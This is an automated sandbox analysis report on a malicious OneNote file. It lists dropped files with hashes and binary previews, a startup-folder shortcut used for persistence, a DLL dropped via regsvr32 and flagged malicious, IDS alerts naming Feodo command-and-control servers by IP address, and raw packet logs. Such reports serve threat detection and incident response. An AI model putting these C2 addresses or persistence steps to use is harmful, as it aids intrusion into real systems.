                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Temp\{FFB0830D-8DF5-44C2-8212-1343D78742E2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6080
                                                                                                  Entropy (8bit):1.0859503608598962
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:RaouCYyfi/UXmfmjoOLWYR/8tljDvFUXIxASgd37RE1VC+YijtAsWc00:YiYyf1k0oOLwLrFUCASg5VE1VjTtAQ
                                                                                                  MD5:0BA86381CD77EA15579D072CB5D254AD
                                                                                                  SHA1:5597D5A6BAA6C7579E69285615A51BA68776A70F
                                                                                                  SHA-256:AE93D5FAE8F96DBD8A0DD807519E8F827252A4371971B9E4B0588B29D071AF6C
                                                                                                  SHA-512:E1FC724236479517EFEE444D998AC8318BDA07B382B3985DA572D85EF849B54742022EC8818D99C652C25BB918571D390CD1CF23BAA24979A7F3812A0A4CF4E4
                                                                                                  Malicious:false
                                                                                                  Preview:./.C..vL....W"v_.A.:.'rD.qBB.. H................?.....I...............................................................................................................h............................................Ka9...I...e.#./........Q.J...hL...n................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3873
                                                                                                  Entropy (8bit):3.4951952067254672
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:a8pfcdO1sqIFy4bqzqgdCDDGTCDS40dRpfcdO1sqh7+xGqzWk7dCDGWG5CD/x6gH:FSURqfGn40xiLZhUx64
                                                                                                  MD5:0FEE2FEA1DEB4A2A68B8414C77EBD84F
                                                                                                  SHA1:6762F41C7BA68E5B928EA18CC61F05E7BC95A5B9
                                                                                                  SHA-256:0263FCD5190BCA12629965FA3CD4C6BEE7EA751CFFDDD94DD5542AEEAA9FCA2D
                                                                                                  SHA-512:B432EA693E26142EEAA7289DF68175A9C8232A65927FDF1B1BF4A1A8585AD0BE99039CF5249A289B27F2B89ADFFFC0D1EDDA4F2A391AFE2D04E9331861FE59D6
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.@.. .....Q{...pZ.-k[....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.tV......................V......C..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.tV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.tV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..tV$..............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5QS7RN3FVDXNQTVRN9N3.temp

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3873
                                                                                                  Entropy (8bit):3.4951952067254672
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:a8pfcdO1sqIFy4bqzqgdCDDGTCDS40dRpfcdO1sqh7+xGqzWk7dCDGWG5CD/x6gH:FSURqfGn40xiLZhUx64
                                                                                                  MD5:0FEE2FEA1DEB4A2A68B8414C77EBD84F
                                                                                                  SHA1:6762F41C7BA68E5B928EA18CC61F05E7BC95A5B9
                                                                                                  SHA-256:0263FCD5190BCA12629965FA3CD4C6BEE7EA751CFFDDD94DD5542AEEAA9FCA2D
                                                                                                  SHA-512:B432EA693E26142EEAA7289DF68175A9C8232A65927FDF1B1BF4A1A8585AD0BE99039CF5249A289B27F2B89ADFFFC0D1EDDA4F2A391AFE2D04E9331861FE59D6
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.@.. .....Q{...pZ.-k[....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.tV......................V......C..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.tV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.tV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..tV$..............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Mon Mar 20 19:33:44 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1251
                                                                                                  Entropy (8bit):4.667538353651001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:8Do2zY+fcdOEwK2MPCh7+5pAyNqzWFUTdCDhxYUUT8zg5zs7aB6m:8TpfcdO1sqh7+kGqzWFwdCDtUxLB6
                                                                                                  MD5:3DB3F3C2A431E31997BD0201A54E61C8
                                                                                                  SHA1:70C04DF8BC30F3B1B66BE3CF68F90AC0D49F437D
                                                                                                  SHA-256:D61B42AFCE3BF41005742E19801B09B39BBEEC938BDA296DC3C71599C11B5D67
                                                                                                  SHA-512:DABFBD5CFCBF86BAA093A161E9BC8175A35F5B908AA24FD403205154B847F6C6EA3F4C897BF17BAD07E28BA4CFB0B79C216EAA3A1CD1CE32FEA4C306504E7976
                                                                                                  Malicious:false
                                                                                                  Preview:L..................F.... ....>-......?.Ck[...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.tV......................V......C..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.tV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.tV.......]......................&.O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.tV7...............................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z|...K.J.........`.......X.......301389...........!a..%.H.VZAj...s..........

                                                                                                  C:\Users\user\Desktop\malware.one

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):135652
                                                                                                  Entropy (8bit):6.650864845930645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:/rfWMINYf3K19kzCnEEQvSMVnte8ZP1Y6J0cTgGh:N6nInM8TXJ5h
                                                                                                  MD5:120B217F4E4F156551BF6023DA8F6343
                                                                                                  SHA1:AC3D60A4C4581493C7B706423CCA26F5101F9FA6
                                                                                                  SHA-256:224303D27D0CB6E783057B6F1F36738EA70E917B1F2DFE1828C43771CE8A3CC2
                                                                                                  SHA-512:77AF3CB95413D7F9CC20C9C11DB501DAC756208CB92AE3D7927D5D1E3552659FCF2353D7E9EE869A50D850409412B06B6399832984EA1B83DED5398016CF70FB
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Source: C:\Users\user\Desktop\malware.one, Author: Joe Security
                                                                                                  Preview:.R\{..M..Sx.)..3.1...M........................?.....I.......*...*...*...*..................................................._fh.*..E.......n........................h................................................EFA...F_q..K.........Y....H.).~...................................<.7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6184
                                                                                                  Entropy (8bit):1.2281132730530626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:RaIzYyfi/U/+CYMjoOLWn+J/doGbLTnI8lUXIxAS0H1DnvVQYaV4A4WDNIB:YIzYyf19oOLfjpjnItCAS0VLVra4Px
                                                                                                  MD5:A98468EAC3602CC816BD9061ED99060C
                                                                                                  SHA1:40A6E92A78D8222119E450F7E2DA99630723FA22
                                                                                                  SHA-256:C40C66ACC6EA9CA83AC57D54A82D01B2E63ABBB5544C3C56AD094184C3E91EEE
                                                                                                  SHA-512:A9F60E8724EBC484DE905EBB566B1713EB27E4143756917307C58660F60764D78F981A4D6A8F05F7AAAD2B62B4EB7658DB5EC9155AC9C945F8B41F28633F65FA
                                                                                                  Malicious:false
                                                                                                  Preview:./.C..vL....W"v_La...E.I..9.[..h................?.....I...............................................................................................................h...........................(.................j..*.L....sd...........^..."DK..o.@.G5.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):360056
                                                                                                  Entropy (8bit):7.518956792923064
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:/vzgd5d1QI6vUih4AIqECkIwr5HUvFOAjNPyFj8XTcrOQMpuNBSbjC:sd5d1AvUiWqrkIwr5wOuqF2TcOQMBbG
                                                                                                  MD5:F45B3CDCEBF2F0F645F70CFAEA6048DC
                                                                                                  SHA1:405141A3F1936A6F2A28C538ABA37082C72CD499
                                                                                                  SHA-256:DC444446C09540A43916560DB59E3779D9BF0977DF5D160F5CFD6DB9F035CBB2
                                                                                                  SHA-512:7A3CD399DBEB5744B179D3C9F6A8DFB19F49B97F5F5D6DA0572C016D5524D24F7D1AC9D8B7F94936D008729615718445FA4E5E402C39523A5419DEC5C4642BEF
                                                                                                  Malicious:false
                                                                                                  Preview:.R\{..M..Sx.)..7....F...k...................?.....I.......*...*...*...*...................a...............................La...E.I..9.[..h0....z..................h...........................x~......0.........F{...E...-g...........YK.p.nYI....q.3=.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Windows\System32\JMgyzwrCUAZpIA\OfEg.dll (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):574976
                                                                                                  Entropy (8bit):7.0854686935842075
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:chQZR06Fy1F5YqSDZ9ma2aCStos1F3uD2Hescq2mc:jT08y1F5YqSDZ9ma21Str3cTX
                                                                                                  MD5:C901C8089C5E017F8E9B4B15C8EF154F
                                                                                                  SHA1:336C2BEA43BFA2E8AFD27A164DBA640F36C0013C
                                                                                                  SHA-256:FD79E8FA5E3801101A1305B6ABA7A5E7FDC852ED9036D6D9A5210BE414A5CC5A
                                                                                                  SHA-512:9FF052F9FC9CC3CF74B170F76D6A20A01C5DBB74B2D97EDC9E55B75F52B408F3104E49BF290773BD63D216F2787D945AA7D954B58E927C99E1DB18C6A7D74ADE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1D".u%L.u%L.u%L.....p%L......%L.....x%L...7.w%L.'MI.i%L.'MH.|%L.'MO.s%L.|]..r%L.u%M..%L..LE.q%L..LL.t%L..L..t%L.u%..t%L..LN.t%L.Richu%L.........PE..d......d.........." .........N............................................... ............ .........................................0...........d....P..`........C...................C..............................0C..................0............................text.../........................... ..`.rdata...&.......(..................@..@.data...d'..........................@....pdata...C.......D..................@..@.rsrc...`....P......................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:data
                                                                                                  Entropy (8bit):6.672417559895415
                                                                                                  TrID:
                                                                                                  • Microsoft OneNote note (16024/2) 100.00%
                                                                                                  File name:malware.one
                                                                                                  File size:134140
                                                                                                  MD5:80a381f900f302d1be5673f54f76321c
                                                                                                  SHA1:1acac99bb1343a9dfd0100042e58e5f4e3a16f61
                                                                                                  SHA256:59ecfd5be8b5d602353660723377ea0b2d517f621b350ce25a9b6f1f1386fd15
                                                                                                  SHA512:b12eca092c29234f9378542ad663f12c89f2a95bc33034985eb64ab7d67a475598b2dad4f261465e36ed9f26327cc75b0bcb59b5d93faf57fc71edac5cdb4269
                                                                                                  SSDEEP:3072:PrfWMINYf3K19kzCnEEQvSMVnte8ZP1Y6J0cTgGt:d6nInM8TXJ5t
                                                                                                  TLSH:9BD3F8F17A520C85F013EC351AF4CA12EA34876E472D2B0FF5A904BE0DFBD499A585E6
                                                                                                  File Content Preview:.R\{...M..Sx.)...3.1...M........................?......I........*...*...*...*..................................................._fh.*..E.......n........................h.............................................2.*<.L....V...I.........Y....H.).~.......

                                                                                                  File Icon

                                                                                                  Icon Hash:d4dce0626664606c

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.2.38.8.8.857840532014169 03/20/23-13:33:35.045170UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5784053192.168.2.38.8.8.8
                                                                                                  192.168.2.3138.197.14.674970580802404306 03/20/23-13:34:39.278063TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 4497058080192.168.2.3138.197.14.67
                                                                                                  192.168.2.393.84.115.2054970870802404346 03/20/23-13:35:12.925218TCP2404346ET CNC Feodo Tracker Reported CnC Server TCP group 24497087080192.168.2.393.84.115.205
                                                                                                  192.168.2.3115.178.55.2249709802404304 03/20/23-13:35:29.032640TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34970980192.168.2.3115.178.55.22
                                                                                                  192.168.2.3218.38.121.17497104432404322 03/20/23-13:35:36.187246TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 1249710443192.168.2.3218.38.121.17

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Mar 20, 2023 13:33:35.128829002 CET4969980192.168.2.3195.2.88.86
                                                                                                  Mar 20, 2023 13:33:38.128187895 CET4969980192.168.2.3195.2.88.86
                                                                                                  Mar 20, 2023 13:33:44.284966946 CET4969980192.168.2.3195.2.88.86
                                                                                                  Mar 20, 2023 13:33:56.577743053 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:56.577814102 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:56.577928066 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:56.582045078 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:56.582112074 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:57.764643908 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:57.764847994 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:57.768184900 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:57.768219948 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:57.768601894 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:57.817334890 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:58.128768921 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:58.128812075 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.193140984 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.193356037 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.193492889 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:58.240739107 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:58.240808010 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.240839005 CET49702443192.168.2.331.31.196.93
                                                                                                  Mar 20, 2023 13:33:58.240856886 CET4434970231.31.196.93192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.445207119 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.445261955 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.445363998 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.453694105 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.453731060 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.565243959 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.565422058 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.620685101 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.620740891 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.621772051 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.624670029 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.624694109 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.729959965 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.730043888 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.730103970 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.730142117 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.730175018 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.730192900 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.730249882 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.731909037 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.732028961 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.732049942 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.732068062 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.732124090 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.733721972 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.773612976 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.773691893 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.773788929 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.773830891 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.773850918 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.773884058 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.774624109 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.774677992 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.774724960 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.774738073 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.774759054 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.775361061 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.775418997 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.775438070 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.775446892 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.775470018 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.775500059 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.775523901 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.817564964 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.817715883 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.817773104 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.818037033 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.818514109 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.818628073 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.818630934 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.818670988 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.818733931 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.818756104 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.819329023 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.819433928 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.819473028 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.819489956 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.819526911 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.819556952 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.819849014 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.819900036 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.819979906 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.819988012 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.820014954 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.820035934 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.820126057 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.822726965 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.822781086 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.822858095 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.822875023 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.822890997 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.822911978 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.857629061 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.857688904 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.857760906 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.857798100 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.857815027 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.857841969 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.860764027 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.860817909 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.860856056 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.860869884 CET4434970340.115.116.248192.168.2.3
